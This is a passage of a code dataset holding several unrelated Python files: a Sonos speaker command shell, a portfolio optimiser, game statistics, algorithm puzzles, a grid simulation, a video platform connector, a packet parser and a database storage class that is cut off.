interrupt.')\n except EOFError:\n err('EOF.')\n\n\ndef complete_command(text, context):\n \"\"\" auto-complete commands\n\n text is the text to be auto-completed\n context is an index, increased for every call for \"text\" to get next match\n \"\"\"\n matches = [cmd for cmd in COMMANDS.keys() if cmd.startswith(text)]\n return matches[context]\n\n\ndef adjust_volume(sonos, operator):\n \"\"\" Adjust the volume up or down with a factor from 1 to 100 \"\"\"\n factor = get_volume_adjustment_factor(operator)\n if not factor:\n return False\n\n vol = sonos.volume\n\n if operator[0] == '+':\n if (vol + factor) > 100:\n factor = 1\n sonos.volume = (vol + factor)\n return sonos.volume\n elif operator[0] == '-':\n if (vol - factor) < 0:\n factor = 1\n sonos.volume = (vol - factor)\n return sonos.volume\n else:\n err(\"Valid operators for volume are + and -\")\n\n\ndef get_volume_adjustment_factor(operator):\n \"\"\" get the factor to adjust the volume with \"\"\"\n factor = 1\n if len(operator) > 1:\n try:\n factor = int(operator[1:])\n except ValueError:\n err(\"Adjustment factor for volume has to be a int.\")\n return\n return factor\n\n\ndef get_current_track_info(sonos):\n \"\"\" Show the current track \"\"\"\n track = sonos.get_current_track_info()\n return (\n \"Current track: %s - %s. From album %s. This is track number\"\n \" %s in the playlist. It is %s minutes long.\" % (\n track['artist'],\n track['title'],\n track['album'],\n track['playlist_position'],\n track['duration'],\n )\n )\n\n\ndef get_queue(sonos):\n \"\"\" Show the current queue \"\"\"\n queue = sonos.get_queue()\n\n # pylint: disable=invalid-name\n ANSI_BOLD = '\\033[1m'\n ANSI_RESET = '\\033[0m'\n\n current = int(sonos.get_current_track_info()['playlist_position'])\n\n queue_length = len(queue)\n padding = len(str(queue_length))\n\n for idx, track in enumerate(queue, 1):\n if idx == current:\n color = ANSI_BOLD\n else:\n color = ANSI_RESET\n\n idx = str(idx).rjust(padding)\n yield (\n \"%s%s: %s - %s. From album %s.\" % (\n color,\n idx,\n track.creator,\n track.title,\n track.album,\n )\n )\n\n\ndef err(message):\n \"\"\" print an error message \"\"\"\n print(message, file=sys.stderr)\n\n\ndef play_index(sonos, index):\n \"\"\" Play an item from the playlist \"\"\"\n queue_length = len(sonos.get_queue())\n try:\n index = int(index) - 1\n if index >= 0 and index < queue_length:\n position = sonos.get_current_track_info()['playlist_position']\n current = int(position) - 1\n if index != current:\n return sonos.play_from_queue(index)\n else:\n raise ValueError()\n except ValueError():\n return \"Index has to be a integer within \\\n the range 1 - %d\" % queue_length\n\n\ndef list_ips():\n \"\"\" List available devices \"\"\"\n sonos = soco.SonosDiscovery()\n return sonos.get_speaker_ips()\n\n\ndef speaker_info(sonos):\n \"\"\" Information about a speaker \"\"\"\n infos = sonos.get_speaker_info()\n return ('%s: %s' % (i, infos[i]) for i in infos)\n\n\ndef volume(sonos, *args):\n \"\"\" Change or show the volume of a device \"\"\"\n if args:\n operator = args[0].lower()\n adjust_volume(sonos, operator)\n\n return sonos.volume\n\n\ndef exit_shell():\n \"\"\" Exit socos \"\"\"\n sys.exit(0)\n\n\ndef play(sonos, *args):\n \"\"\" Start playing \"\"\"\n if args:\n idx = args[0]\n play_index(sonos, idx)\n else:\n sonos.play()\n return get_current_track_info(sonos)\n\n\ndef play_next(sonos):\n \"\"\" Play the next track \"\"\"\n sonos.next()\n return get_current_track_info(sonos)\n\n\ndef play_previous(sonos):\n \"\"\" Play the previous track \"\"\"\n sonos.previous()\n return get_current_track_info(sonos)\n\n\ndef state(sonos):\n \"\"\" Get the current state of a device / group \"\"\"\n return sonos.get_current_transport_info()['current_transport_state']\n\n\ndef set_speaker(ip_address):\n \"\"\" set the current speaker for the shell session \"\"\"\n # pylint: disable=global-statement,fixme\n # TODO: this should be refactored into a class with instance-wide state\n global CUR_SPEAKER\n CUR_SPEAKER = soco.SoCo(ip_address)\n\n\ndef unset_speaker():\n \"\"\" resets the current speaker for the shell session \"\"\"\n global CUR_SPEAKER # pylint: disable=global-statement\n CUR_SPEAKER = None\n\n\ndef get_help(command=None):\n \"\"\" Prints a list of commands with short description \"\"\"\n\n def _cmd_summary(item):\n \"\"\" Format command name and first line of docstring \"\"\"\n name, func = item[0], item[1][1]\n if isinstance(func, str):\n func = getattr(soco.SoCo, func)\n doc = getattr(func, '__doc__') or ''\n doc = doc.split('\\n')[0].lstrip()\n return ' * {cmd:12s} {doc}'.format(cmd=name, doc=doc)\n\n if command and command in COMMANDS:\n func = COMMANDS[command][1]\n doc = getattr(func, '__doc__') or ''\n doc = [line.lstrip() for line in doc.split('\\n')]\n out = '\\n'.join(doc)\n else:\n texts = ['Available commands:']\n # pylint: disable=bad-builtin\n texts += map(_cmd_summary, COMMANDS.items())\n out = '\\n'.join(texts)\n return out\n\n\n# COMMANDS indexes commands by their name. Each command is a 2-tuple of\n# (requires_ip, function) where function is either a callable, or a\n# method name to be called on a SoCo instance (depending on requires_ip)\n# If requires_ip is False, function must be a callable.\nCOMMANDS = OrderedDict((\n # cmd req IP func\n # pylint: disable=bad-whitespace\n ('list', (False, list_ips)),\n ('partymode', (True, 'partymode')),\n ('info', (True, speaker_info)),\n ('play', (True, play)),\n ('pause', (True, 'pause')),\n ('stop', (True, 'stop')),\n ('next', (True, play_next)),\n ('previous', (True, play_previous)),\n ('current', (True, get_current_track_info)),\n ('queue', (True, get_queue)),\n ('volume', (True, volume)),\n ('state', (True, state)),\n ('ml_index', (True, MUSIC_LIB.index)),\n ('ml_tracks', (True, MUSIC_LIB.tracks)),\n ('ml_albums', (True, MUSIC_LIB.albums)),\n ('ml_artists', (True, MUSIC_LIB.artists)),\n ('ml_playlists', (True, MUSIC_LIB.playlists)),\n ('exit', (False, exit_shell)),\n ('set', (False, set_speaker)),\n ('unset', (False, unset_speaker)),\n ('help', (False, get_help)),\n))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"socos.py","file_name":"socos.py","file_ext":"py","file_size_in_byte":23755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"612342666","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ncovarMat = pd.read_csv('/home/hassan/Downloads/Book1.csv')\nreturns = pd.read_csv('/home/hassan/Downloads/Book2.csv')\ntBills = pd.read_csv('/home/hassan/Downloads/Book3.csv')\ntBills.drop(0,inplace=True)\n\nsP500 = pd.read_csv('/home/hassan/Downloads/Book4.csv')\nasset_pctChange_daily = pd.read_csv('/home/hassan/Downloads/Book5.csv')\nasset_pctChange_daily.drop('S&P500',axis=1,inplace=True)\nomega = np.array(covarMat)\nreturns = returns[['Stock code' , 'avg_expected_return']]\nexp_returns = np.array(returns['avg_expected_return'])\nassets = 20\nassets_ref = 2\nasset_pctChange = np.array(asset_pctChange_daily)\n\n\n\n\nrisk_free_rate = 0.021\ntBills.drop('Unnamed: 2', axis=1, inplace=True)\n\nfor i in range(len(tBills)):\n\ttBills.loc[i+1,'Tbills'] = tBills.loc[i+1,'Tbills']/100\n\n\n\ntBills_sP500 = tBills.merge(sP500, on='Time Period')\npctCh_sP500 = tBills_sP500['S&P 500'].pct_change()\ndf_pctCh_sP500 = pd.DataFrame({'pctCh_sP500': pctCh_sP500})\n\n\npctCh_sP500_tBills = df_pctCh_sP500.join(tBills_sP500['Tbills'])\n\nch1 = pctCh_sP500_tBills.describe()\nch2 = pctCh_sP500_tBills.corr()\ncorr_ref = ch2.loc['Tbills','pctCh_sP500']\n\n\nmeans_ref = np.array(ch1.loc['mean',ch1.columns])\nstd_ref = np.array(ch1.loc['std',ch1.columns])\nlabels_ref = np.array(ch1.columns)\nref_cov = corr_ref*std_ref[0]*std_ref[1]\n\n\nprint(' ' , labels_ref)\nprint('mean : ' , means_ref)\nprint('std : ' , std_ref)\ntbill_ret = means_ref[1]\nsP500_ret = means_ref[0]\ntbill_risk = std_ref[1]\nsP500_risk = std_ref[0]\n\nprint('reference portfolio covariance : ', ref_cov)\n'''________________Monte Carlo Simulation_________________'''\nnumOfPortfolios = 75000\nreturns_risks = np.array([[0,0]])\nweights_hist = np.array([[0 for i in range(assets)]])\nsharpeRatios = np.array([0])\n\n\n\nreturns_risks_ref = np.array([[0,0]])\nweights_hist_ref = np.array([[0 for i in range(assets_ref)]])\nsharpeRatios_ref = np.array([0])\ncovarMat_ref = np.array(pctCh_sP500_tBills.cov())\n\n\n'''___ Monte Carlo Simulation for Optimal Portfolio calculation___'''\nfor i in range(numOfPortfolios):\n\tw = np.random.random(size=assets)\n\tw = np.absolute(w)\n\tw /= sum(w)\n\tfirst = omega.dot(w)\n\tvariance = np.dot(w, first)\n\tvolatility = np.sqrt(variance)\n\treturn_portfolio = np.dot(w,exp_returns)\n\tdiff = return_portfolio - risk_free_rate\n\tsharpeRatios = np.append(sharpeRatios, diff/volatility)\n\treturns_risks = np.append(returns_risks,\n\t\t [[return_portfolio,volatility]],\n\t\t axis=0)\n\tweights_hist = np.append(weights_hist,\n\t\t\t\t\t\t [[i for i in w]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks = np.delete(returns_risks,(0),axis=0)\n\tweights_hist = np.delete(weights_hist,(0),axis=0)\n\tsharpeRatios = np.delete(sharpeRatios,(0),axis=0)\n\tmax_sharpe = max(sharpeRatios)\n\tmax_sharpe_index = np.argmax(sharpeRatios)\n\tweights_optimal = weights_hist[max_sharpe_index]\n\n\nexp_returns_ref = np.array([sP500_ret , tbill_ret])\n\nfor i in range(numOfPortfolios):\n\tw_ref = np.random.random(size=assets_ref)\n\tw_ref = np.absolute(w_ref)\n\tw_ref /= sum(w_ref)\n\tfirst_ref = np.dot(covarMat_ref,w_ref)\n\tvariance_ref = np.dot(w_ref, first_ref)\n\tvolatility_ref = np.sqrt(variance_ref)\n\treturn_portfolio_ref = np.dot(w_ref,exp_returns_ref)\n\tdiff_ref = return_portfolio_ref - risk_free_rate\n\tsharpeRatios_ref = np.append(sharpeRatios_ref, diff_ref/volatility_ref)\n\treturns_risks_ref = np.append(returns_risks_ref,\n\t\t [[return_portfolio_ref, volatility_ref]],\n\t\t axis=0)\n\tweights_hist_ref = np.append(weights_hist_ref,\n\t\t\t\t\t\t [[i for i in w_ref]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks_ref = np.delete(returns_risks_ref,(0),axis=0)\n\tweights_hist_ref = np.delete(weights_hist_ref,(0),axis=0)\n\tsharpeRatios_ref = np.delete(sharpeRatios_ref,(0),axis=0)\n\tmax_sharpe_ref = max(sharpeRatios_ref)\n\tmax_sharpe_index_ref = np.argmax(sharpeRatios_ref)\n\tweights_optimal_ref = weights_hist_ref[max_sharpe_index_ref]\n\n\n\t\nprint('\\n \\n')\n\nprint('the maximum sharpe ratio is : ', max_sharpe)\nprint('optimal returns & risk : ' , returns_risks[max_sharpe_index])\nreturn_risk_opt = returns_risks[max_sharpe_index]\nreturn_risk_refOpt = returns_risks_ref[max_sharpe_index_ref]\n\nprint('\\n')\nw1_ref_port = returns_risks[max_sharpe_index,0]/tbill_ret\nprint(str(returns_risks[max_sharpe_index,0])+'/'+str(tbill_ret))\nprint('\\n')\nprint('The reference portfolio needs a '+str(w1_ref_port)+' times greater investment to match our portfolio\\'s return')\nprint('\\n')\nrisk_ref = w1_ref_port*tbill_risk\nriskComparison_port2ref = returns_risks[max_sharpe_index,1]/risk_ref\nprint('Our portfolio is '+str(riskComparison_port2ref)+' times risker than the reference portfolio')\nprint(str(returns_risks[max_sharpe_index,1])+'/'+str(risk_ref))\n\nprint('\\n \\n')\nprint('the maximum sharpe ratio for ref portfolio is : ', max_sharpe_ref)\nprint('optimal returns & risk for ref portfolio is : ' , returns_risks_ref[max_sharpe_index_ref])\nprint('weights for optimal ref portfolio are : ' , weights_optimal_ref)\nprint('\\n \\n ')\nprint('comparing sharpe ratios : ' , max_sharpe , max_sharpe_ref )\n\n\n\nportfolio_pctChange = asset_pctChange.dot(weights_optimal)\nportfolio_pctChange_ref = np.array(pctCh_sP500_tBills['Tbills']*w1_ref_port)\n\ndf_pctCh_Optport_ref = pd.DataFrame({'Opt Pf Pct Change' : portfolio_pctChange ,\n\t 'Ref Pf Pct Change' : portfolio_pctChange_ref})\n\n\nsharpe_ratio_ref_m = (return_risk_opt[0]-risk_free_rate)/risk_ref\n\n\ndf_corr_portRef = df_pctCh_Optport_ref.corr()\ndf_covMat_portRef = df_pctCh_Optport_ref.cov()\ncorrelation_OptPort_ref = df_corr_portRef.loc['Opt Pf Pct Change' , 'Ref Pf Pct Change']\n\n\ndf_weights_optimal = pd.DataFrame({'optimal port weights' : weights_optimal})\ndf_weights_optimal_ref = pd.DataFrame({'optimal ref_port weights' : weights_optimal_ref})\n\ndf_return_risk_opt = pd.DataFrame({'optimal portfolio' : np.append(return_risk_opt,max_sharpe),\n\t 'ref optimal portfolio' : np.append(return_risk_refOpt,max_sharpe_ref),\n\t 'ref retMatch portfolio' : [return_risk_opt[0], risk_ref, sharpe_ratio_ref_m ]},\n\t index = ['return','risk','sharpe ratio'] )\n\ndf_misc = pd.DataFrame({ 'Others' : [correlation_OptPort_ref , w1_ref_port , riskComparison_port2ref] },\n\t index = ['corr OptPort & Ref_m' , 'return scale OptPort/refPort', 'risk scale OptPort/refPort'])\n\ndf_corr_portRef.to_csv('corr_matrix_optPort_ref_m.csv')\ndf_covMat_portRef.to_csv('VaCov_mat_optPort_ref_m.csv')\ndf_weights_optimal.to_csv('optPort_weights.csv')\ndf_weights_optimal_ref.to_csv('optRef_weights.csv')\ndf_misc.to_csv('misc.csv')\ndf_return_risk_opt.to_csv('ret_risk_sharpe_optPort_optref_mref.csv')\n\n\nprint(df_return_risk_opt)\n\nx = np.linspace(0, 0.4, numOfPortfolios)\nx2 = np.linspace(0, 0.05, numOfPortfolios)\n\nplt.plot(x, max_sharpe*x + risk_free_rate,label='Our Capital Market Line' ,color='black')\nplt.plot(x2, max_sharpe_ref*x2 + risk_free_rate,label='ref Capital Market Line' ,color='green')\n\n\n\nplt.scatter(return_risk_opt[1],\n\t\t\treturn_risk_opt[0],\n\t\t\tlabel='Optimal Portfolio',\n\t\t\tc='c',\n\t\t\tmarker='x',\n\t\t\ts=200)\nplt.scatter(returns_risks[:,1],\n\t returns_risks[:,0],\n\t label='BitCoin Portfolio Frontier',\n\t c='r',\n\t marker='o')\nplt.scatter(returns_risks_ref[:,1],\n\t returns_risks_ref[:,0],\n\t label='Reference Portfolio Frontier',\n\t c='b',\n\t marker='o')\n\n\nplt.xlabel('Risk')\nplt.ylabel('Expected Return')\nplt.legend(loc=4, prop={'size': 12})\nplt.title('Efficient Frontiers')\nprint(return_risk_opt)\nplt.show()\n\n\n\n","sub_path":"Optimal_port.py","file_name":"Optimal_port.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165899846","text":"#!/usr/bin/env python3\nfrom chiller_essential import *\nimport datetime\n\naPlayers=[]\n\ndef CalcKD(k, d):\n if k == 0:\n return str(0)\n if d == 0:\n return str(k)\n return str(\"%.2f\" % (k / d))\n\ndef BestTime(t1, t2):\n t = min(t1,t2)\n if t == 0:\n return max(t1, t2) #if no time yet --> set the highest\n return t #if captured already use lowest time\n\ndef A_Best(a1, a2):\n if a1 == \"\":\n return a2\n elif a2 == \"\":\n return a1\n if a1 < a2:\n return a1 # use oldest time\n return a2\n\nclass Player:\n #def __init__(self, name, time=0.0, spree=0, team=\"\", a_haxx0r = \"\", a_blazeit = \"\", a_satan = \"\", a_virgin = \"\"):\n def __init__(self, name, time=0.0, spree=0, team=\"\"):\n self.name = name\n self.kills = 0\n self.deaths = 0\n self.flag_grabs = 0\n self.flag_caps_red = 0\n self.flag_caps_blue = 0\n self.flag_time = time\n self.flagger_kills = 0\n self.best_spree = spree\n self.wins = 0\n self.looses = 0\n self.a_haxx0r = \"\"\n self.a_blazeit = \"\"\n self.a_satan = \"\"\n self.a_virgin = \"\"\n '''\n self.a_haxx0r = a_haxx0r\n self.a_blazeit = a_blazeit\n self.a_satan = a_satan\n self.a_virgin = a_virgin\n '''\n #round variables (not saved)\n self.killingspree = 0\n self.IsFlagger = False\n self.team = team\n self.LastChat = datetime.datetime.now()\n self.MuteScore = 0\n self.IsMuted = False\n def __add__(self, other):\n tmp_player = Player(self.name)\n tmp_player.kills = self.kills + other.kills\n tmp_player.deaths = self.deaths + other.deaths\n tmp_player.flag_grabs = self.flag_grabs + other.flag_grabs\n tmp_player.flag_caps_red = self.flag_caps_red + other.flag_caps_red\n tmp_player.flag_caps_blue = self.flag_caps_blue + other.flag_caps_blue\n tmp_player.flag_time = BestTime(self.flag_time, other.flag_time)\n tmp_player.flagger_kills = self.flagger_kills + other.flagger_kills\n tmp_player.best_spree = max(self.best_spree, other.best_spree)\n tmp_player.wins = self.wins + other.wins\n tmp_player.looses = self.looses + other.looses\n tmp_player.a_haxx0r = A_Best(self.a_haxx0r, other.a_haxx0r)\n tmp_player.a_blazeit = A_Best(self.a_blazeit, other.a_blazeit)\n tmp_player.a_satan = A_Best(self.a_satan, other.a_satan)\n tmp_player.a_virgin = A_Best(self.a_virgin, other.a_virgin)\n \"\"\"\n say(\"== merging '\" + other.name + \"' -> into -> '\" + self.name + \"' ===\")\n say(\"src: \")\n say(\"k/d: \" + str(other.kills) + \" g/r/b/t: \" + str(other.flag_grabs) + \"/\" + str(other.flag_caps_red) + \"/\" + str(other.flag_caps_blue) + \"/\" + str(other.flag_time))\n say(\"dst: \")\n say(\"k/d: \" + str(self.kills) + \" g/r/b/t: \" + str(self.flag_grabs) + \"/\" + str(self.flag_caps_red) + \"/\" + str(self.flag_caps_blue) + \"/\" + str(self.flag_time))\n say(\"merge: \")\n say(\"k/d: \" + str(tmp_player.kills) + \" g/r/b/t: \" + str(tmp_player.flag_grabs) + \"/\" + str(tmp_player.flag_caps_red) + \"/\" + str(tmp_player.flag_caps_blue) + \"/\" + str(tmp_player.flag_time))\n \"\"\"\n return tmp_player\n def ShowStats(self):\n say(\"[stats] '\" + str(self.name) + \"' kills: \" + str(self.kills) + \" deaths: \" + str(self.deaths) + \" killingspree: \" + str(self.best_spree))\n #say(\"[stats] '\" + self.name + \"' flagtime: \" + str(self.flag_time))\n def ShowStatsRound(self):\n say(\"[round-stats] '\" + str(self.name) + \"' kd: \" + CalcKD(self.kills,self.deaths) + \" (\" + str(self.kills) + \"/\" + str(self.deaths) + \")\")\n\n","sub_path":"src/base_player.py","file_name":"base_player.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499461046","text":"# -*- coding:utf-8 -*-\nclass Solution1:\n def cutRope(self, number):\n # write code here\n if number<=1:\n return 0\n elif number ==2:\n return 1\n elif number == 3:\n return 2\n\n products = [0,1,2,3]\n for i in range(4,number+1):\n max= 0\n for j in range(1,int(i/2)+1):\n product = products[j]*products[i-j]\n if product > max:\n max= product\n\n products.append(max)\n\n return max\n\n\nclass Solution2:\n def cutRope(self, number):\n # write code here\n if number<=1:\n return 0\n elif number ==2:\n return 1\n elif number == 3:\n return 2\n\n threetimes = int(number/3)\n if(number%3==1):\n threetimes -=1\n\n twotimes = int((number - threetimes*3)/2)\n\n max = pow(3,threetimes)*pow(2,twotimes)\n return max\n\nif __name__ == \"__main__\":\n solution1 = Solution2()\n a = solution1.cutRope(8)\n print(a)\n","sub_path":"py-project/Solution14 2.py","file_name":"Solution14 2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"131142097","text":"# 282. Expression Add Operators\n# https://leetcode.com/problems/expression-add-operators/description/\n\n# Solution: DFS\n# 1)For every position between 2 digits, there are 4 possibilities:\n# no operator; operator +, operator -, operator *\n# Try all of them \n# 2) if using python: eval result string directly to get value,\n# if not using python, eval on the go, special care to operator *.\n# 3) special care to digit 0, since 0 can't be starting digit for num except for 0\n\nOPS = ['+', '-', '*']\n\ndef constructExpression(num, ops):\n ans = []\n for i in xrange(len(num)):\n ans.append(ops[i])\n ans.append(num[i])\n\n return ''.join(ans)\n\ndef generateOperators(num, target, ops, pos, zero_start, ans):\n if pos == len(num):\n expression = constructExpression(num, ops)\n res = eval(expression)\n if res == target:\n ans.append(expression)\n return\n\n # don't insert op\n if not zero_start:\n ops[pos] = ''\n generateOperators(num, target, ops, pos+1, False, ans)\n\n # insert op\n zero_start = num[pos] == '0'\n for op in OPS:\n ops[pos] = op\n generateOperators(num, target, ops, pos+1, zero_start, ans)\n\n return\n\nclass Solution(object):\n def addOperators(self, num, target):\n \"\"\"\n :type num: str\n :type target: int\n :rtype: List[str]\n \"\"\"\n if len(num) == 0:\n return []\n\n ops = [''] * len(num)\n ans = []\n\n zero_start = num[0] == '0'\n generateOperators(num, target, ops, 1, zero_start, ans)\n\n return ans\n\ns = Solution()\nans = s.addOperators(\"123456789\", 45)\nprint(ans)\n ","sub_path":"282.py","file_name":"282.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"46197257","text":"import constants\nfrom random import randint, shuffle\nfrom agent import Agent\n\n\nclass GridModel(object):\n\n def __init__(self):\n self.agents = []\n\n def update(self):\n indices = list(range(len(self.agents)))\n shuffle(indices)\n for index in indices: # update agents in random order\n agent = self.agents[index]\n agent.set_neighbors(self.check_neighbors(agent.x, agent.y))\n if agent.current_activity == constants.SEARCH_AGENT:\n agent.set_dir(self.find_path(agent))\n agent.update(self.get_random_target(index))\n\n def get_random_target(self, agent_idx):\n target_idx = randint(0, (len(self.agents) - 1))\n while target_idx == agent_idx:\n target_idx = randint(0, (len(self.agents) - 1))\n return self.agents[target_idx]\n\n def check_neighbors(self, x, y):\n dirs = [None, None, None, None]\n dirs[constants.NORTH] = self.agent_at(x, y - 1)\n dirs[constants.EAST] = self.agent_at(x + 1, y)\n dirs[constants.SOUTH] = self.agent_at(x, y + 1)\n dirs[constants.WEST] = self.agent_at(x - 1, y)\n return dirs\n\n def agent_at(self, x, y):\n for agent in self.agents:\n if agent.x == x and agent.y == y:\n return agent\n return None\n\n def get_number_of_agents(self):\n return len(self.agents)\n\n def add_agent(self, id, no_agents):\n x = randint(0, constants.TILES_X - 1)\n y = randint(0, constants.TILES_Y - 1)\n self.agents.append(Agent(x, y, id, no_agents))\n\n def find_path(self, agent):\n start = (agent.x, agent.y)\n end = (agent.target_agent.x, agent.target_agent.y)\n\n explored = []\n queue = [start]\n levels = {}\n levels[start] = 0\n visited = [start]\n\n while queue:\n pos = queue.pop(0)\n x = pos[0]\n y = pos[1]\n explored.append(pos)\n neighbours = [(x, y-1), (x+1, y), (x, y+1), (x-1, y)]\n for neighbour in neighbours:\n if neighbour[0] < 0 or neighbour[0] >= constants.TILES_X or neighbour[1] < 0 or neighbour[1] \\\n >= constants.TILES_Y:\n continue\n if self.agent_at(neighbour[0], neighbour[1]) and not neighbour == end:\n continue\n if neighbour not in visited:\n queue.append(neighbour)\n visited.append(neighbour)\n\n levels[neighbour] = levels[pos] + 1\n\n print(levels[start])\n print(levels[end])\n\n\n\n","sub_path":"gridmodel.py","file_name":"gridmodel.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510770218","text":"from functools import partial\n\nfrom commonspy.logging import log_info\n\nfrom connector import config\nfrom connector.facebook import upload_video_to_facebook, update_video_on_facebook, unpublish_video_on_facebook, \\\n delete_video_on_facebook\nfrom connector.youtube_mcn import upload_video_to_youtube_mcn, delete_video_on_youtube_mcn, unpublish_video_on_youtube_mcn, \\\n update_video_on_youtube_mcn\nfrom connector.youtube_direct import upload_video_to_youtube_direct, delete_video_on_youtube_direct, \\\n unpublish_video_on_youtube_direct, update_video_on_youtube_direct\n\n\ndef test_mode_action(action, video, registry):\n log_info(\"DRY MODE action: '%s' | video: %s | registry: %s\" % (action, video.__dict__, registry.__dict__))\n\nregistered_platforms = {\n 'facebook': {\n 'upload': upload_video_to_facebook,\n 'update': update_video_on_facebook,\n 'unpublish': unpublish_video_on_facebook,\n 'delete': delete_video_on_facebook\n },\n 'youtube': {\n 'upload': upload_video_to_youtube_mcn,\n 'update': update_video_on_youtube_mcn,\n 'unpublish': unpublish_video_on_youtube_mcn,\n 'delete': delete_video_on_youtube_mcn\n },\n 'youtube_direct': {\n 'upload': upload_video_to_youtube_direct,\n 'update': update_video_on_youtube_direct,\n 'unpublish': unpublish_video_on_youtube_direct,\n 'delete': delete_video_on_youtube_direct\n }\n }\n\ntest_mode_platforms = {\n 'facebook': {\n 'upload': partial(test_mode_action, 'facebook upload'),\n 'update': partial(test_mode_action, 'facebook update'),\n 'unpublish': partial(test_mode_action, 'facebook unpublish'),\n 'delete': partial(test_mode_action, 'facebook delete')\n },\n 'youtube': {\n 'upload': partial(test_mode_action, 'youtube upload'),\n 'update': partial(test_mode_action, 'youtube update'),\n 'unpublish': partial(test_mode_action, 'youtube unpublish'),\n 'delete': partial(test_mode_action, 'youtube delete')\n },\n 'youtube_direct': {\n 'upload': partial(test_mode_action, 'youtube_direct upload'),\n 'update': partial(test_mode_action, 'youtube_direct update'),\n 'unpublish': partial(test_mode_action, 'youtube_direct unpublish'),\n 'delete': partial(test_mode_action, 'youtube_direct delete')\n }\n}\n\nclass PlatformInteraction(object):\n def __init__(self):\n if config.property('test_mode'):\n self.registered_platforms = test_mode_platforms\n else:\n self.registered_platforms = registered_platforms\n\n def execute_platform_interaction(self, platform, interaction, video, registry_model):\n if platform in self.registered_platforms and interaction in self.registered_platforms[platform]:\n self.registered_platforms[platform][interaction](video, registry_model)\n else:\n raise Exception('Target platform %s with interaction %s does not exist!')\n","sub_path":"connector/platforms.py","file_name":"platforms.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496074619","text":"\nimport datetime\nimport time\nimport os\n\nfrom CCITT_CRC16 import CRCfromString\n\n\nclass BIRDpacket(object):\n def __init__(self, strin, filename):\n \"\"\"\n given a line in a string input it as a packet\n \"\"\"\n dt = datetime.datetime.strptime(os.path.basename(filename)[0:10], '%Y-%m-%d')\n hour, minute, second, millisecond = strin.split(' - ')[0].split(':')\n self.grt = datetime.datetime(dt.year, dt.month, dt.day, int(hour),\n int(minute), int(second), int(millisecond)*100)\n self.raw = strin.split(' - ')[1]\n self.srcid = self.raw.split()[1:3]\n self.destid = self.raw.split()[3:5]\n self.cmd_tlm = self.raw.split()[5]\n self.funid = self.raw.split()[6]\n self.seqnum = self.raw.split()[7] # number of pages in request\n self.seqidx = self.raw.split()[8] # counts up to self.seqnum \n self.pktnum = self.raw.split()[9] # packet within page, goes up to 0x13 for each page (last could end early)\n self.datalen = self.raw.split()[10] # can be sorted for the last packet in a page\n self.data = self.raw.split()[11:11+int(self.datalen,16)]\n self.crc = self.raw.split()[11+int(self.datalen, 16):11+int(self.datalen, 16)+2]\n self.valid_crc = self._crc_valid()\n\n def __eq__(self, other):\n attrs = ['data', 'srcid', 'destid']\n for a in attrs:\n if getattr(self, a) != getattr(other, a):\n return False\n return True\n \n def _crc_valid(self):\n \"\"\"\n if the calcuated CRC matches what is in the packet True, False otherwise\n \"\"\"\n calc_crc = CRCfromString(' '.join(self.raw.split(' ')[1:-3])).upper()\n if calc_crc[2:4].upper() == self.crc[0].upper() and \\\n calc_crc[4:6].upper() == self.crc[1].upper():\n return True\n else:\n return False\n\n def __str__(self):\n return('BIRDpacket: GRT: {0} Len:{1}'.format(self.grt.isoformat(), int(self.datalen, 16)))\n\n __repr__ = __str__\n\n\nclass BIRDpackets(list):\n \"\"\"\n make a list of all the BIRDpacket instances in a file\n \"\"\"\n def __init__(self, infile):\n \"\"\"\n given a filename parse into many BIRDpacket instances\n \"\"\"\n super(BIRDpackets, self).__init__()\n with open(infile, 'r') as fp:\n dat = fp.readlines()\n dat = [v.strip() for v in dat]\n self.filename = infile\n # make this class a list of BIRDpacket objects\n self.extend([BIRDpacket(v, self.filename) for v in dat])\n \n def __str__(self):\n return(\"{0} packets: {1} bad CRC\".format(len(self), int(sum([v.valid_crc for v in self if not v.valid_crc]))))\n\n __repr__ = __str__\n","sub_path":"L0toL1/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"115858828","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage database storage for hbnb clone\"\"\"\nimport MySQLdb\nfrom sqlalchemy.orm import sessionmaker, scoped_session, Session\nfrom models.base_model import BaseModel, Base\nimport os\nfrom sqlalchemy.engine import create_engine\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\n\n\nclass DBStorage:\n \"\"\"class DBStorage\"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n \"\"\"__init__\"\"\"\n username = os.getenv('HBNB_MYSQL_USER')\n password = os.getenv('HBNB_MYSQL_PWD')\n host = os.getenv('HBNB_MYSQL_HOST')\n database = os.getenv('HBNB_MYSQL_DB')\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'.format(\n username, password, host, database), pool_pre_ping=True)\n if os.getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\"Returns a dictionary of models currently in storage\"\"\"\n classes = {\n 'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity,\n 'Review': Review\n }\n result = {}\n if cls in classes:\n objs = self.__session.query(classes[cls]).all()\n for obj in objs:\n key 